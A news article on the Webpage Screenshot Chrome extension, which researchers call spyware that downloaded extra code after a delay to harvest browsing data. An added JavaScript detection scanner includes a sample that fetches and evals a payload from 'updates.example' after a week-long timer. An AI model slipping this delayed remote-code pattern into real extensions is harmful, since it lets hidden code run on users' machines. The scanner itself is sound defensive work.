Chrome security under fire from third-party extension

Security researchers say Webpage Screenshot, a popular third-party extension for Google Chrome, was secretly collecting end-user browsing data. Its true purpose and how Google missed it remain up for debate.

Webpage Screenshot, an add-on screen-capturing tool for Google Chrome, managed to bypass Google Inc.'s security controls and secretly collected users' browsing details without their knowledge, according to researchers, leading to new questions about the security of third-party Chrome extensions.

Researchers at Heimdal Security in Denmark published a report on Webpage Screenshot this week and went so far as to call the popular extension "spyware." Yet when Webpage Screenshot, which has 1.2 million users, was released for use, it had not demonstrated any malicious behavior. According to Heimdal Security, its spyware capabilities were initiated a week later via download of additional code from the Web, which allowed the extension to collect data such as users' IP addresses, URLs visited, files and data loaded from URLs, search queries entered and even personal contact information.

"On the surface it all looks good: When you run it in the sandbox environment, it doesn't look like it does anything malicious," said Peter Kruse, founder of CSIS Security Group, which spun off Heimdal Security last year. "A time wait is usually a bad sign, because who would put a function like time wait into good code? You can use it as an indicator of a potential malicious thing."

The spyware functions of Webpage Screenshot were actually published separately on StopMalvertising a year ago. According to Kruse, the discovery was simply not picked up by media and the extension continued to collect and sell user browser data.

Swedish newspaper Dagens Nyheter (DN) reported on the popular extension this week when the malicious behavior was discovered by Sentor MSS, a security services firm based in Stockholm. The Swedish media spread this news to the Danish media, and it eventually landed in the Heimdal Security lab.

"We issued a warning as well," Kruse said, "because there was quite many [40,000] Danish users using this extension."

The warnings eventually led Google to remove the add-on from its Google Chrome Web Store earlier this week.

"It is against the Chrome Web Store Content Policies to distribute malware," a Google spokesperson wrote in an email to SearchSecurity. "When we detect items containing malware or learn of them through reports, we remove them from the Chrome Web Store and from active Chrome instances."

Primary purpose: Screenshots or data exfiltration?

During its research into Webpage Screenshot, Heimdal Security followed the registrant information on the extension's homepage to the developer: Aminadav Glickshein, a resident of Israel. According to Heimdal, Glickshein used a server in New York to redirect data transmitted by the app that included sensitive information.

"The primary purpose of this extension is not to provide a screenshot function," Kruse said. "That's actually kind of lame in the first place, because you have built-in screenshot functions."

Last year, Chrome instituted its Single Purpose Policy, requiring extensions to serve only a single purpose. Chrome extensions undergo testing for snooping and unwanted transmission of user browsing data -- the unwanted complications that led to this policy being instated.

"It's literally just a camouflage tool that has grown very large in popularity," Kruse said. "The real purpose [of the extension] was to extract a lot of traffic, a lot of data, and a lot of user behavior."

But Glickshein denies this. "Private data [was] never sent to any server," Glickshein said in an email to SearchSecurity. "Google removed [the extension] because of reporters."

Yet the DN newspaper reported it was in contact with "the owner" of Webpage Screenshot and that he told the newspaper that the aim of the extension was to "produce statistics on surfing behavior," which he called commercially valuable.

Chrome extension security

Despite the controversy surrounding Webpage Screenshot and the long-standing security issues with add-ons for all Web browsers, Kruse acknowledged Google is doing the best it can with Chrome extension security considering the many submissions that it receives. To some degree, he said, the end users need to trust the vendor whose application they are using. Asking Google to do a complete manual code review for every add-on, he noted, would be unfeasible.

"Obviously when you have to validate a lot of applications, a lot of extensions, in the day -- you need to automate that process," Kruse said. "And [if] you don't take into account that there are things that might sleep for a while or might include updating things from an external side, then there's bound to be a security risk."

But Kruse said Google could do more in the realm of vendor verification. He suggested implementing a Netflix-style star-based ratings system to gauge trust, with users who have been submitting quality code for a while earning more trust stars. He also recommended checking apps for sleep functions within their code, for which "even being creative" he could not come up with a legitimate use.
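The two signals Kruse describes, code that sleeps for a long time and code that pulls in updates from an external site, can be checked statically in an unpacked extension's JavaScript. The sketch below is an added example, not code from Heimdal Security, Google or the extension itself; the function names, the one-hour threshold, the `updates.example` URL and both sample snippets are constructed assumptions.

```javascript
// Triage heuristics for an unpacked extension's JavaScript (added example).
const HOUR_MS = 60 * 60 * 1000; // assumed threshold: UI timers rarely exceed this

// Return the top-level arguments of the call whose "(" is at index `open`.
// Heuristic only: brackets inside string literals are not handled.
function callArgs(src, open) {
  const args = [];
  let depth = 0, start = open + 1;
  for (let i = open; i < src.length; i++) {
    const c = src[i];
    if ('([{'.includes(c)) depth++;
    else if (')]}'.includes(c)) {
      if (--depth === 0) { args.push(src.slice(start, i).trim()); return args; }
    } else if (c === ',' && depth === 1) {
      args.push(src.slice(start, i).trim());
      start = i + 1;
    }
  }
  return args; // unbalanced input: return what was collected
}

// Evaluate a delay written as a product of numeric literals, e.g. "7*24*60*60*1000".
function literalDelay(expr) {
  const parts = expr.split('*').map(p => p.trim());
  if (!parts.every(p => /^\d+(\.\d+)?$/.test(p))) return null; // not a pure literal
  return parts.reduce((acc, p) => acc * Number(p), 1);
}

// Flag long sleeps and fetched-then-evaluated code in one source file.
function scanSource(src) {
  const findings = [];
  for (const m of src.matchAll(/\bset(?:Timeout|Interval)\s*\(/g)) {
    const args = callArgs(src, m.index + m[0].length - 1);
    const delay = args.length > 1 ? literalDelay(args[1]) : null;
    if (delay !== null && delay >= HOUR_MS) findings.push(`long-timer:${delay}`);
  }
  const fetchesRemote = /\b(?:fetch|XMLHttpRequest)\b/.test(src) && /https?:\/\//.test(src);
  const dynamicEval = /\beval\s*\(|\bnew\s+Function\s*\(/.test(src);
  if (fetchesRemote && dynamicEval) findings.push('remote-code-eval');
  return findings;
}

// Constructed samples, not the real extension's code.
const SUSPICIOUS = `
setTimeout(function () {
  fetch("https://updates.example/payload.js").then(r => r.text()).then(code => eval(code));
}, 7 * 24 * 60 * 60 * 1000);`;
const BENIGN = `setTimeout(function () { hideToast(a, 1); }, 3000);`;
console.log(scanSource(SUSPICIOUS), scanSource(BENIGN));
```

A hit is a reason for manual review rather than a verdict: delays computed at run time or stored install timestamps would not be caught by the literal-delay check.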

Join the conversation

3 comments

Should companies like Google do more to verify the security of third-party extensions?
It’s easy to say of course they should. The real question is how should they do it? We’ve seen where Apple’s screening process is much less than advertised.
This is quite interesting! The entire point of a sandbox is to limit access to that sort of data. The fact that a screenshot application could gain access to that data in the first place shows how the permissions are not fine-grained enough. Instead Google should have a way of saying "no access to History, Bookmarks, etc." and only grant permission on extensions that need it. This allows users to do a sanity test, asking the question, "Does it really need access to my history for taking a screenshot?"